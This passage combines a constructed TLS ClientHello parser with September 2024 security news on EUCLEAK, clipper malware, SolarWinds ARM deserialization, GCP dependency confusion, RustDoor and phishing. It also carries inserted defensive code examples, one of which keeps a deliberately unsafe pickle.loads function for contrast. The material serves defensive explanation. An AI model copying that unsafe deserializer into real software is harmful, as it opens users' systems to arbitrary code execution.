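Chrome is moving the hybrid key exchange codepoint from 0x6399
(Kyber768+X25519) to 0x11EC (ML-KEM768+X25519), and the two are not
interoperable. This parser reads supported_groups and key_share from a
ClientHello so a defender can tell which codepoint a client advertises.
The ClientHello bytes are CONSTRUCTED by build_client_hello(); they are
not real Chrome traffic.
"""
import struct

# TLS named-group codepoints: IANA values plus the two hybrids named on the page.
GROUP_NAMES = {
    0x0017: "secp256r1",
    0x001D: "x25519",
    0x6399: "X25519Kyber768Draft00",   # previous Chrome codepoint
    0x11EC: "X25519MLKEM768",          # new Chrome codepoint
}
PQ_HYBRIDS = {0x6399, 0x11EC}
EXT_SUPPORTED_GROUPS = 10
EXT_KEY_SHARE = 51


def build_client_hello(groups, key_shares):
    """Constructed minimal TLS 1.3 ClientHello with record and handshake headers.

    groups: list of codepoints for supported_groups.
    key_shares: dict codepoint -> key_exchange bytes for key_share.
    """
    body = b"\x03\x03" + bytes(32)                 # legacy_version, random
    body += b"\x00"                                # empty legacy_session_id
    body += struct.pack("!H", 2) + b"\x13\x01"     # cipher_suites: TLS_AES_128_GCM_SHA256
    body += b"\x01\x00"                            # compression_methods: null only
    sg = b"".join(struct.pack("!H", g) for g in groups)
    sg_ext = struct.pack("!HH", EXT_SUPPORTED_GROUPS, len(sg) + 2) + struct.pack("!H", len(sg)) + sg
    ks = b"".join(struct.pack("!HH", g, len(k)) + k for g, k in key_shares.items())
    ks_ext = struct.pack("!HH", EXT_KEY_SHARE, len(ks) + 2) + struct.pack("!H", len(ks)) + ks
    exts = sg_ext + ks_ext
    body += struct.pack("!H", len(exts)) + exts
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def parse_client_hello(data):
    """Return {'supported_groups': [...], 'key_share_groups': [...]}.

    Raises ValueError when the bytes are not a handshake record carrying a ClientHello.
    """
    if len(data) < 9 or data[0] != 0x16 or data[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    pos = 9 + 2 + 32                               # skip headers, legacy_version, random
    sid_len = data[pos]; pos += 1 + sid_len
    cs_len = struct.unpack("!H", data[pos:pos + 2])[0]; pos += 2 + cs_len
    cm_len = data[pos]; pos += 1 + cm_len
    ext_len = struct.unpack("!H", data[pos:pos + 2])[0]; pos += 2
    end = pos + ext_len
    if end > len(data):
        raise ValueError("extensions length exceeds record")
    result = {"supported_groups": [], "key_share_groups": []}
    while pos + 4 <= end:
        ext_type, ext_size = struct.unpack("!HH", data[pos:pos + 4])
        ext = data[pos + 4:pos + 4 + ext_size]
        pos += 4 + ext_size
        if ext_type == EXT_SUPPORTED_GROUPS and len(ext) >= 2:
            n = struct.unpack("!H", ext[:2])[0]
            result["supported_groups"] = [struct.unpack("!H", ext[2 + i:4 + i])[0]
                                          for i in range(0, n, 2)]
        elif ext_type == EXT_KEY_SHARE and len(ext) >= 2:
            n = struct.unpack("!H", ext[:2])[0]
            off = 2
            while off + 4 <= 2 + n:                # each entry: group, length, key_exchange
                g, klen = struct.unpack("!HH", ext[off:off + 4])
                result["key_share_groups"].append(g)
                off += 4 + klen
    return result


def pq_hybrid_status(client_hello):
    """Summarise which hybrid codepoints the client offers and predicts a key share for."""
    parsed = parse_client_hello(client_hello)
    offered = [GROUP_NAMES.get(g, hex(g)) for g in parsed["supported_groups"] if g in PQ_HYBRIDS]
    shared = [GROUP_NAMES.get(g, hex(g)) for g in parsed["key_share_groups"] if g in PQ_HYBRIDS]
    return {"offered": offered, "key_share": shared}


if __name__ == "__main__":
    # Constructed: a client that has already moved to the ML-KEM codepoint.
    hello = build_client_hello([0x11EC, 0x001D, 0x0017], {0x11EC: bytes(1216), 0x001D: bytes(32)})
    print(pq_hybrid_status(hello))
```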
The development comes shortly after the U.S. National Institute of Standards and Technology (NIST) published the final versions of three new encryption algorithms meant to secure current systems against future attacks using quantum technologies, marking the culmination of an eight-year effort from the agency.
The algorithms in question, FIPS 203 (aka ML-KEM), FIPS 204 (aka CRYSTALS-Dilithium or ML-DSA), and FIPS 205 (aka Sphincs+ or SLH-DSA), are meant for general encryption and protecting digital signatures. A fourth algorithm, FN-DSA (originally called FALCON), is slated for finalization later this year.
ML-KEM, short for Module-Lattice-based Key-Encapsulation Mechanism, is derived from the round-three version of the CRYSTALS-KYBER KEM and can be used to establish a shared secret key between two parties communicating over a public channel.
Microsoft, for its part, is also readying for a post-quantum world by announcing an update to its SymCrypt cryptographic library with support for ML-KEM and eXtended Merkle Signature Scheme (XMSS).
"Adding post-quantum algorithm support to the underlying crypto engine is the first step towards a quantum safe world," the Windows maker said, stating the transition to post-quantum cryptography (PQC) is a "complex, multi-year and iterative process" that requires careful planning.
The disclosure also follows the discovery of a cryptographic flaw in the Infineon SLE78, Optiga Trust M, and Optiga TPM security microcontrollers that could allow for the extraction of Elliptic Curve Digital Signature Algorithm (ECDSA) private keys from YubiKey hardware authentication devices.
The cryptographic flaw within the Infineon-supplied library is believed to have remained unnoticed for 14 years and about 80 highest-level Common Criteria certification evaluations.
The side-channel attack, dubbed EUCLEAK (CVE-2024-45678, CVSS score: 4.9) by NinjaLab's Thomas Roche, affects all Infineon security microcontrollers embedding the cryptographic library and the following YubiKey devices -
YubiKey 5 Series versions prior to 5.7
YubiKey 5 FIPS Series prior to 5.7
YubiKey 5 CSPN Series prior to 5.7
YubiKey Bio Series versions prior to 5.7.2
Security Key Series all versions prior to 5.7
YubiHSM 2 versions prior to 2.4.0
YubiHSM 2 FIPS versions prior to 2.4.0
"The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM, knowledge of the accounts they want to target, and specialized equipment to perform the necessary attack," Yubico, the company behind YubiKey, said in a coordinated advisory.
"Depending on the use case, the attacker may also require additional knowledge including username, PIN, account password, or [YubiHSM] authentication key."
But because existing YubiKey devices with vulnerable firmware versions can't be updated – an intentional design choice meant to maximize security and avoid introducing new vulnerabilities – they are permanently susceptible to EUCLEAK.
The company has since announced plans to deprecate support for Infineon's cryptographic library in favor of its own cryptographic library as part of YubiKey firmware version 5.7 and YubiHSM 2 firmware version 2.4.
A similar side-channel attack against Google Titan security keys was demonstrated by Roche and Victor Lomne in 2021, potentially allowing malicious actors to clone the devices by exploiting an electromagnetic side-channel in the chip embedded in them.
"The [EUCLEAK] attack requires physical access to the secure element (few local electromagnetic side-channel acquisitions, i.e. few minutes, are enough) in order to extract the ECDSA secret key," Roche said. "In the case of the FIDO protocol, this allows to create a clone of the FIDO device."
U.S. Treasury Sanctions Executives Linked to Intellexa Predator Spyware Operation
17.9.24 BigBrothers The Hacker News
The U.S. Department of Treasury has imposed fresh sanctions against five executives and one entity with ties to the Intellexa Consortium for their role in the development, operation, and distribution of a commercial spyware called Predator.
"The United States will not tolerate the reckless propagation of disruptive technologies that threatens our national security and undermines the privacy and civil liberties of our citizens," said Acting Under Secretary of the Treasury for Terrorism and Financial Intelligence, Bradley T. Smith.
"We will continue to hold accountable those that seek to enable the proliferation of exploitative technologies, while also encouraging the responsible development of technologies that align with international standards."
The sanctioned individuals and entities are listed below -
Felix Bitzios, the beneficial owner of an Intellexa Consortium company that's believed to have supplied Predator to a foreign government client and the manager of Intellexa S.A.
Andrea Nicola Constantino Hermes Gambazzi, the beneficial owner of Thalestris Limited and Intellexa Limited, which are both members of the Intellexa Consortium
Merom Harpaz, a top executive of the Intellexa Consortium and the manager of Intellexa S.A.
Panagiota Karaoli, director of multiple Intellexa Consortium entities that are controlled by or are a subsidiary of Thalestris Limited
Artemis Artemiou, an employee of Intellexa S.A., as well as the general manager and member of the board of Cytrox Holdings, another member of the Intellexa Consortium
Aliada Group Inc., a British Virgin Islands-based company and member of the Intellexa Consortium that has facilitated tens of millions of dollars of transactions
Thalestris Limited has been involved in processing transactions on behalf of other entities within the Intellexa Consortium, the Treasury said, adding that Aliada Group is directed by Tal Jonathan Dilian, the founder of the Intellexa Consortium.
The department described the consortium as a "complex international web of decentralized companies that built and commercialized a comprehensive suite of highly invasive spyware products."
The development comes a little over six months after the Treasury sanctioned Dilian, Sara Aleksandra Fayssal Hamou, and five other entities, including Intellexa S.A., on similar grounds.
It also follows a resurgence of Predator spyware activity after a period of relative silence by likely customers in Angola, the Democratic Republic of the Congo (DRC), and Saudi Arabia using new infrastructure that's designed to evade detection.
"The latest evolution of Predator infrastructure includes an additional tier in its delivery infrastructure to improve customer anonymization and enhanced operational security in its server configurations and associated domains," Recorded Future said.
"Although Predator spyware operators have changed significant aspects of their infrastructure setup, including changes that make country-specific attribution more challenging, they have largely retained their mode of operation."
It also follows Apple's decision to file a motion to dismiss its lawsuit against NSO Group, citing concerns that court disclosures could endanger its efforts to combat spyware, that steps are being taken to avoid sharing information related to the Pegasus spyware, and that the impact of any ruling could be diluted by an expanding spyware market with new emerging players.
Binance Warns of Rising Clipper Malware Attacks Targeting Cryptocurrency Users
17.9.24 Cryptocurrency The Hacker News
Cryptocurrency exchange Binance is warning of an "ongoing" global threat that's targeting cryptocurrency users with clipper malware with the goal of facilitating financial fraud.
Clipper malware, also called ClipBankers, is a type of malware that Microsoft calls cryware, which comes with capabilities to monitor a victim's clipboard activity and steal sensitive data a user copies, including replacing cryptocurrency addresses with those under an attacker's control.
In doing so, digital asset transfers initiated on a compromised system are routed to a rogue wallet instead of the intended destination address.
"In clipping and switching, a cryware monitors the contents of a user's clipboard and uses string search patterns to look for and identify a string resembling a hot wallet address," the tech giant noted way back in 2022. "If the target user pastes or uses CTRL + V into an application window, the cryware replaces the object in the clipboard with the attacker's address."
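The check a defender can build from Microsoft's description above is the mirror image of the malware: remember what the user actually copied and, at paste time, confirm the clipboard still holds it. The following is an added example written for this page, not code from Microsoft or Binance; the address patterns are simplified format checks (no checksum validation) and the copy/paste sequence in demo() is constructed.

```python
"""Clipboard swap detection (added example; not code from Microsoft or Binance).

Clipping-and-switching malware waits for a string that looks like a hot-wallet
address to land on the clipboard and overwrites it with an attacker-controlled
address of the same family, so the victim pastes the wrong destination. The
defence modelled here remembers what the user actually copied and checks, at
paste time, that the clipboard still holds it. Two syntactically valid
addresses that differ is the tell-tale of a swap. The address patterns are
simplified assumptions (format checks only, no checksum verification).
"""
import re
from typing import Dict, List, Optional

BASE58 = r"[a-km-zA-HJ-NP-Z1-9]"
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(rf"^[13]{BASE58}{{25,34}}$"),
    "btc_bech32": re.compile(r"^bc1[a-z0-9]{25,62}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "tron": re.compile(rf"^T{BASE58}{{33}}$"),
}


def classify_address(text: str) -> Optional[str]:
    """Return the address family a string resembles, or None."""
    text = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return family
    return None


class ClipboardGuard:
    """Compares what the user copied with what is about to be pasted."""

    def __init__(self) -> None:
        self.expected: Optional[str] = None
        self.events: List[Dict[str, Optional[str]]] = []

    def on_copy(self, value: str) -> None:
        # Hook for a user-initiated copy (e.g. Ctrl+C); records the trusted value.
        self.expected = value.strip()

    def on_paste(self, clipboard_value: str) -> Dict[str, Optional[str]]:
        """Classify a paste: 'ok', 'swap' (address replaced by another address)
        or 'modified' (address replaced by something that is not an address)."""
        current = clipboard_value.strip()
        expected_kind = classify_address(self.expected) if self.expected else None
        current_kind = classify_address(current)
        if expected_kind is None or current == self.expected:
            verdict = "ok"          # user copied a non-address, or nothing changed
        elif current_kind is not None:
            verdict = "swap"        # address -> different address: classic clipper
        else:
            verdict = "modified"    # address -> non-address: still tampered with
        event = {"verdict": verdict, "expected": self.expected, "got": current,
                 "family": current_kind or expected_kind}
        self.events.append(event)
        return event


def demo() -> List[str]:
    """Constructed copy/paste sequence; returns the verdict for each paste."""
    guard = ClipboardGuard()
    legit_eth = "0x" + "ab" * 20      # constructed, not a real wallet
    swapped_eth = "0x" + "cd" * 20    # constructed attacker address
    guard.on_copy(legit_eth)
    guard.on_paste(legit_eth)         # clipboard untouched
    guard.on_paste(swapped_eth)       # a clipper replaced it before the paste
    guard.on_copy("meeting notes")
    guard.on_paste("meeting notes")   # non-address content is never flagged
    return [e["verdict"] for e in guard.events]


if __name__ == "__main__":
    print(demo())
```

Wiring on_copy/on_paste to real clipboard hooks is platform-specific and left out; the point is that the comparison happens against the value the user copied, not against whatever the clipboard currently contains, because the latter is exactly what the malware controls.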
Binance, in an advisory issued on September 13, 2024, said it has been tracking a widespread malware threat that intercepts data stored in the clipboard with an aim to swap out cryptocurrency wallet addresses.
"The issue has seen a notable spike in activity, particularly on August 27, 2024, leading to significant financial losses for affected users," the exchange said. "The malware is often distributed through unofficial apps and plugins, especially on Android and web apps, but iOS users should also remain vigilant."
There is evidence to suggest that these malicious apps are inadvertently installed by users when searching for software in their native languages or through unofficial channels, primarily due to restrictions in their countries.
The company also said it's taking steps to blocklist the attacker addresses to prevent further fraudulent transactions, and that it has notified affected users, advising them to check for signs of suspicious software or plugins.
Besides urging users to refrain from downloading software from unofficial sources, Binance is calling for exercising caution when it comes to installing apps and plugins and ensuring they are authentic.
Blockchain analytics firm Chainalysis revealed last month that aggregate illicit activity on-chain has dropped by nearly 20% year-to-date, although stolen funds inflows nearly doubled from $857 million to $1.58 billion.
"Scammers for the most part continue to pivot away from broad-based ponzi schemes to more targeted campaigns like pig butchering, work from home scams, drainers, or address poisoning," it said, adding it observed a "rise in the use of Chinese language marketplaces and laundering networks."
According to the U.S. Federal Bureau of Investigation (FBI), 2023 was a record year for cryptocurrency fraud, with total losses exceeding $5.6 billion, a 45% increase compared to the previous year.
"The exploitation of cryptocurrency was most pervasive in investment scams, where losses accounted for almost 71% of all losses related to cryptocurrency. Call center frauds, including tech/customer support scams and government impersonation scams, accounted for about 10% of losses associated to cryptocurrency," the FBI Internet Crime Complaint Center (IC3) said.
The vast majority of the losses with a cryptocurrency nexus originated from the U.S., followed by the Cayman Islands, Mexico, Canada, the U.K., India, Australia, Israel, Germany, and Nigeria.
SolarWinds Issues Patch for Critical ARM Vulnerability Enabling RCE Attacks
17.9.24 Vulnerability The Hacker News
SolarWinds has released fixes to address two security flaws in its Access Rights Manager (ARM) software, including a critical vulnerability that could result in remote code execution.
The vulnerability, tracked as CVE-2024-28991, is rated 9.0 out of a maximum of 10.0 on the CVSS scoring system. It has been described as an instance of deserialization of untrusted data.
"SolarWinds Access Rights Manager (ARM) was found to be susceptible to a remote code execution vulnerability," the company said in an advisory. "If exploited, this vulnerability would allow an authenticated user to abuse the service, resulting in remote code execution."
Security researcher Piotr Bazydlo of the Trend Micro Zero Day Initiative (ZDI) has been credited with discovering and reporting the flaw on May 24, 2024.
The ZDI, which has assigned the shortcoming a CVSS score of 9.9, said it exists within a class called JsonSerializationBinder and stems from a lack of proper validation of user-supplied data, thus exposing ARM devices to a deserialization vulnerability that could then be abused to execute arbitrary code.
"Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed," the ZDI said.
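The ZDI's description above, a binder that resolves type names taken from the payload without validating them, is the textbook shape of a deserialization flaw, and the fix shape is an allow-list binder that resolves only the few types the application expects. The following is an added example written for this page, not SolarWinds code, and it uses Python's pickle rather than .NET because Python's Unpickler.find_class is the same hook as Json.NET's serialization binder; AccessRule, RestrictedUnpickler and the payloads are constructed for the demonstration.

```python
"""Allow-list type binding for a deserializer (added example, Python analogue).

A serialization binder that maps a type name found in untrusted input straight
to a runtime type lets the sender choose which class gets instantiated. The
hardened form validates the (module, name) pair against an explicit allow-list
and fails closed on anything else. This is not SolarWinds code; the class,
the unpickler and the payloads below are constructed for the demo.
"""
import datetime
import io
import pickle
from dataclasses import dataclass


@dataclass
class AccessRule:
    """The one type this application legitimately expects on the wire."""
    principal: str
    permission: str


# (module, qualified name) pairs the binder may resolve. Anything else is refused.
ALLOWED_TYPES = {(AccessRule.__module__, AccessRule.__qualname__)}


class RestrictedUnpickler(pickle.Unpickler):
    """A binder that validates the type name before resolving it."""

    def find_class(self, module: str, name: str):
        if (module, name) in ALLOWED_TYPES:
            return super().find_class(module, name)
        # Fail closed: the payload named a type the application never agreed to build.
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_loads(data: bytes):
    """Hardened deserializer: payload types are checked against ALLOWED_TYPES."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def unsafe_loads(data: bytes):
    """The 'before' picture: resolves whatever type the payload names."""
    return pickle.loads(data)


def is_rejected(data: bytes) -> bool:
    """True if the hardened loader refuses the payload."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


# Constructed payloads: one the application expects, and one that names a type
# outside the allow-list (a harmless stand-in for an arbitrary attacker choice).
LEGIT_PAYLOAD = pickle.dumps(AccessRule("alice", "read"))
FOREIGN_PAYLOAD = pickle.dumps(datetime.date(2024, 9, 17))


if __name__ == "__main__":
    print("hardened loader accepts expected type:", safe_loads(LEGIT_PAYLOAD))
    print("hardened loader rejects foreign type:", is_rejected(FOREIGN_PAYLOAD))
    print("legacy loader resolves it anyway:", unsafe_loads(FOREIGN_PAYLOAD))
```

The allow-list is keyed on the fully qualified name, not the short class name, so a look-alike type in another module cannot slip through; the same holds for a .NET binder, which should compare assembly and type name together.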
Also addressed by SolarWinds is a medium-severity flaw in ARM (CVE-2024-28990, CVSS score: 6.3) that exposed a hard-coded credential which, if successfully exploited, could allow unauthorized access to the RabbitMQ management console.
Both issues have been patched in ARM version 2024.3.1. Although there is currently no evidence of active exploitation, users are recommended to update to the latest version as soon as possible to safeguard against potential threats.
The development comes as D-Link has resolved three critical vulnerabilities affecting DIR-X4860, DIR-X5460, and COVR-X1870 routers (CVE-2024-45694, CVE-2024-45695, and CVE-2024-45697, CVSS scores: 9.8) that could enable remote execution of arbitrary code and system commands.
Google Fixes GCP Composer Flaw That Could've Led to Remote Code Execution
16.9.24 Vulnerability The Hacker News
A now-patched critical security flaw impacting Google Cloud Platform (GCP) Composer could have been exploited to achieve remote code execution on cloud servers by means of a supply chain attack technique called dependency confusion.
The vulnerability has been codenamed CloudImposer by Tenable Research.
"The vulnerability could have allowed an attacker to hijack an internal software dependency that Google pre-installs on each Google Cloud Composer pipeline-orchestration tool," security researcher Liv Matan said in a report shared with The Hacker News.
Dependency confusion (aka substitution attack), which was first documented by security researcher Alex Birsan in February 2021, refers to a type of software supply chain compromise in which a package manager is tricked into pulling a malicious package from a public repository instead of the intended file of the same name from an internal repository.
So, a threat actor could stage a large-scale supply chain attack by publishing a counterfeit package to a public package repository with the same name as a package internally developed by companies and with a higher version number.
This, in turn, causes the package manager to unknowingly download the malicious package from the public repository instead of the private repository, effectively replacing the existing package dependency with its rogue counterpart.
The problem identified by Tenable is similar in that it could be abused to upload a malicious package to the Python Package Index (PyPI) repository with the name "google-cloud-datacatalog-lineage-producer-client," which could then be preinstalled on all Composer instances with elevated permissions.
While Cloud Composer requires that the package in question is version-pinned (i.e., version 0.1.0), Tenable found that using the "--extra-index-url" argument during a "pip install" command prioritizes fetching the package from the public registry, thereby opening the door to dependency confusion.
Armed with this privilege, attackers could execute code, exfiltrate service account credentials, and move laterally in the victim's environment to other GCP services.
Following responsible disclosure on January 18, 2024, it was fixed by Google in May 2024 by ensuring that the package is only installed from a private repository. It has also added the extra precaution of verifying the package's checksum in order to confirm its integrity and validate that it has not been tampered with.
The Python Packaging Authority (PyPA) is said to have been aware of the risks posed by the "--extra-index-url" argument since at least March 2018, urging users to skip using PyPI in cases where the internal package needs to be pulled.
"Packages are expected to be unique up to name and version, so two wheels with the same package name and version are treated as indistinguishable by pip," a PyPA member noted at the time. "This is a deliberate feature of the package metadata, and not likely to change."
Google, as part of its fix, now also recommends that developers use the "--index-url" argument instead of the "--extra-index-url" argument and that GCP customers make use of an Artifact Registry virtual repository when requiring multiple repositories.
"The '--index-url' argument reduces the risk of dependency confusion attacks by only searching for packages in the registry that was defined as a given value for that argument," Matan said.
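The mechanism behind the CloudImposer finding and the PyPA note above can be made concrete with a small model of how pip chooses between indexes. The following is an added illustration written for this page, not pip's own resolver: with --extra-index-url every index is consulted and two candidates with the same name and version are indistinguishable, so a pinned private package may be served by the public index; with --index-url only the named index is searched. The index contents and the private index URL are constructed; the package name is the one Tenable reported.

```python
"""Why a version pin plus --extra-index-url still allows dependency confusion.

Added illustration written for this page, not pip's own resolver. It models the
two behaviours described in the text: with --extra-index-url pip consults every
configured index and treats same-name/same-version candidates as
indistinguishable, while --index-url restricts the search to one index. The
private index URL and the published versions are constructed.
"""
from typing import Dict, List, Optional, Sequence, Tuple

PUBLIC_INDEX = "https://pypi.org/simple"                      # pip's default index
PRIVATE_INDEX = "https://artifacts.example.internal/simple"   # constructed
PACKAGE = "google-cloud-datacatalog-lineage-producer-client"

# index url -> package -> published versions (constructed: an attacker has
# uploaded both the pinned version and a higher one to the public index).
INDEXES: Dict[str, Dict[str, List[str]]] = {
    PRIVATE_INDEX: {PACKAGE: ["0.1.0"]},
    PUBLIC_INDEX: {PACKAGE: ["0.1.0", "99.0.0"]},
}


def parse_version(v: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in v.split("."))


def satisfies(version: str, spec: Optional[str]) -> bool:
    """Only '==X.Y.Z' pins and unpinned requirements are modelled (assumption)."""
    if spec is None:
        return True
    if not spec.startswith("=="):
        raise ValueError("only '==' pins are modelled")
    return parse_version(version) == parse_version(spec[2:])


def resolve(package: str, spec: Optional[str], index_url: str,
            extra_index_urls: Sequence[str] = (),
            indexes: Dict[str, Dict[str, List[str]]] = INDEXES) -> Tuple[str, List[str]]:
    """Pick the highest matching version across all consulted indexes.

    Returns (version, origins). More than one origin means the installer has
    no basis for preferring the private copy: the outcome is the attacker's.
    """
    candidates = []
    for url in (index_url, *extra_index_urls):
        for v in indexes.get(url, {}).get(package, []):
            if satisfies(v, spec):
                candidates.append((parse_version(v), v, url))
    if not candidates:
        raise LookupError(f"no candidate for {package}{spec or ''}")
    best = max(key for key, _, _ in candidates)
    origins = sorted({url for key, _, url in candidates if key == best})
    version = next(v for key, v, _ in candidates if key == best)
    return version, origins


def audit_pip_args(argv: Sequence[str]) -> List[str]:
    """Flag the two weak settings in a pip install command line."""
    findings = []
    if any(a.startswith("--extra-index-url") for a in argv):
        findings.append("--extra-index-url merges a second index with the default one; "
                        "use --index-url pointing at a single (virtual) repository")
    if "--require-hashes" not in argv:
        findings.append("no --require-hashes; pin artifact hashes so a same-name, "
                        "same-version substitute fails verification")
    return findings


if __name__ == "__main__":
    print("extra-index-url, pinned:  ", resolve(PACKAGE, "==0.1.0", PUBLIC_INDEX, [PRIVATE_INDEX]))
    print("extra-index-url, unpinned:", resolve(PACKAGE, None, PUBLIC_INDEX, [PRIVATE_INDEX]))
    print("index-url only, pinned:   ", resolve(PACKAGE, "==0.1.0", PRIVATE_INDEX))
    print(audit_pip_args(["pip", "install", "--extra-index-url", PRIVATE_INDEX, f"{PACKAGE}==0.1.0"]))
```

The first call returns two origins for the pinned version, which is the ambiguity the PyPA member described; the third, using --index-url alone, returns only the private index. The hash check that Google added is what audit_pip_args asks for with --require-hashes: it turns a same-name, same-version substitute into a verification failure.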
North Korean Hackers Target Cryptocurrency Users on LinkedIn with RustDoor Malware
16.9.24 APT The Hacker News
Cybersecurity researchers are continuing to warn about North Korean threat actors' attempts to target prospective victims on LinkedIn to deliver malware called RustDoor.
The latest advisory comes from Jamf Threat Labs, which said it spotted an attack attempt in which a user was contacted on the professional social network by someone claiming to be a recruiter for a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi.
The malicious cyber activity is part of a multi-pronged campaign unleashed by cyber threat actors backed by the Democratic People's Republic of Korea (DPRK) to infiltrate networks of interest under the pretext of conducting interviews or coding assignments.
The financial and cryptocurrency sectors are among the top targets for the state-sponsored adversaries seeking to generate illicit revenues and meet an ever-evolving set of objectives based on the regime's interests.
These attacks manifest in the form of "highly tailored, difficult-to-detect social engineering campaigns" aimed at employees of decentralized finance ("DeFi"), cryptocurrency, and similar businesses, as recently highlighted by the U.S. Federal Bureau of Investigation (FBI) in an advisory.
One of the notable indicators of North Korean social engineering activity relates to requests to execute code or download applications on company-owned devices, or devices that have access to a company's internal network.
Another aspect worth mentioning is that such attacks also involve "requests to conduct a 'pre-employment test' or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories."
Instances featuring such tactics have been extensively documented in recent weeks, underscoring a persistent evolution of the tools used in these campaigns against targets.
The latest attack chain detected by Jamf entails tricking the victim into downloading a booby-trapped Visual Studio project as part of a purported coding challenge that embeds within it bash commands to download two different second-stage payloads ("VisualStudioHelper" and "zsh_env") with identical functionality.
This second-stage malware is RustDoor, which the company is tracking as Thiefbucket. As of writing, none of the anti-malware engines have flagged the zipped coding test file as malicious. It was uploaded to the VirusTotal platform on August 7, 2024.
"The config files embedded within the two separate malware samples show that the VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file," researchers Jaron Bradley and Ferdous Saljooki said.
RustDoor, a macOS backdoor, was first documented by Bitdefender in February 2024 in connection with a malware campaign targeting cryptocurrency firms. A subsequent analysis by S2W uncovered a Golang variant dubbed GateDoor that's meant for infecting Windows machines.
The findings from Jamf are significant, not only because they mark the first time the malware has been formally attributed to North Korean threat actors, but also for the fact that the malware is written in Objective-C.
VisualStudioHelper is also designed to act as an information stealer by harvesting files specified in the configuration, but only after prompting the user to enter their system password by masquerading it as though it's originating from the Visual Studio app to avoid raising suspicion.
Both the payloads, however, operate as a backdoor and use two different servers for command-and-control (C2) communications.
"Threat actors continue to remain vigilant in finding new ways to pursue those in the crypto industry," the researchers said. "It's important to train your employees, including your developers, to be hesitant to trust those who connect on social media and ask users to run software of any type.
"These social engineering schemes performed by the DPRK come from those who are well-versed in English and enter the conversation having well researched their target."
Apple Drops Spyware Case Against NSO Group, Citing Risk of Threat Intelligence Exposure
16.9.24 OS The Hacker News
Apple has filed a motion to "voluntarily" dismiss its lawsuit against commercial spyware vendor NSO Group, citing a shifting risk landscape that could lead to exposure of critical "threat intelligence" information.
The development was first reported by The Washington Post on Friday.
The iPhone maker said its efforts, coupled with those of others in the industry and national governments to tackle the rise of commercial spyware, have "substantially weakened" the defendants.
"At the same time, unfortunately, other malicious actors have arisen in the commercial spyware industry," the company said. "It is because of this combination of factors that Apple now seeks voluntary dismissal of this case."
"While Apple continues to believe in the merits of its claims, it has also determined that proceeding further with this case has the potential to put vital security information at risk."
Apple originally filed the lawsuit against the Israeli company in November 2021 in an attempt to hold it accountable for illegally targeting users with its Pegasus surveillance tool.
It described NSO Group, a subsidiary of Q Cyber Technologies Limited, as "amoral 21st century mercenaries who have created highly sophisticated cyber-surveillance machinery that invites routine and flagrant abuse."
Earlier this January, a federal judge denied a motion from NSO Group to dismiss the lawsuit on the grounds that the company is "based in Israel and Apple should have sued them there," with the court stating that "the anti-hacking purpose of the [Computer Fraud and Abuse Act] fits Apple's allegations to a T, and NSO has not shown otherwise."
In its motion for voluntary dismissal, Apple said three major developments contributed to its decision. The first is the risk that the threat intelligence information it has developed to protect users against spyware attacks could be exposed, pointing to a July 25, 2024, report from The Guardian.
The British newspaper revealed that Israeli officials had seized documents from NSO Group in July 2020 in an apparent effort to stop the handover of information about the notorious hacking tool as part of the company's ongoing legal tussle with Meta-owned WhatsApp, which filed a similar lawsuit in 2019.
"The seizures were part of an unusual legal maneuver created by Israel to block the disclosure of information about Pegasus, which the government believed would cause 'serious diplomatic and security damage' to the country," The Guardian noted at the time.
Apple also cited as reasons the changing dynamics in the commercial spyware industry and the proliferation of different spyware companies, as well as the possibility of revealing to third-parties "the information Apple uses to defeat spyware while defendants and others create significant obstacles to obtaining an effective remedy."
The development comes as the Atlantic Council divulged that the individuals behind some of the spyware vendors in Israel, Italy, and India that have come under the scanner for enabling authoritarian regimes to spy on human rights advocates, opposition leaders, and journalists have sought to rename them, start new ones, or undertake strategic jurisdiction hopping.
Case in point, Intellexa, the now-sanctioned company behind the Predator spyware, has resurfaced with new infrastructure in connection with its ongoing use by likely customers in countries such as Angola, the Democratic Republic of the Congo (DRC), and Saudi Arabia.
"Predator's operators have significantly enhanced their infrastructure, adding layers of complexity to evade detection," cybersecurity company Recorded Future's Insikt Group said.
"The new infrastructure includes an additional tier in its multi-tiered delivery system, which anonymizes customer operations, making it even harder to identify which countries are using the spyware."
Cybercriminals Exploit HTTP Headers for Credential Theft via Large-Scale Phishing Attacks
16.9.24 Phishing The Hacker News
Cybersecurity researchers have warned of ongoing phishing campaigns that abuse refresh entries in HTTP headers to deliver spoofed email login pages that are designed to harvest users' credentials.
"Unlike other phishing webpage distribution behavior through HTML content, these attacks use the response header sent by a server, which occurs before the processing of the HTML content," Palo Alto Networks Unit 42 researchers Yu Zhang, Zeyu You, and Wei Wang said.
"Malicious links direct the browser to automatically refresh or reload a web page immediately, without requiring user interaction."
Targets of the large-scale activity, observed between May and July 2024, include large corporations in South Korea, as well as government agencies and schools in the U.S. As many as 2,000 malicious URLs have been associated with the campaigns.
Over 36% of the attacks have singled out the business-and-economy sector, followed by financial services (12.9%), government (6.9%), health and medicine (5.7%), and computer and internet (5.4%).
The attacks are the latest in a long list of tactics that threat actors have employed to obfuscate their intent and trick email recipients into parting with sensitive information, including taking advantage of trending top-level domains (TLDs) and domain names to propagate phishing and redirection attacks.
The infection chains are characterized by the delivery of malicious links through header refresh URLs containing targeted recipients' email addresses. The URL to which the browser is redirected is embedded in the Refresh response header.
The starting point of the infection chain is an email message containing a link that mimics a legitimate or compromised domain that, when clicked, triggers the redirection to the actor-controlled credential harvesting page.
To lend the phishing attempt a veneer of legitimacy, the malicious webmail login pages have the recipients' email addresses pre-filled. Attackers have also been observed using legitimate domains that offer URL shortening, tracking, and campaign marketing services.
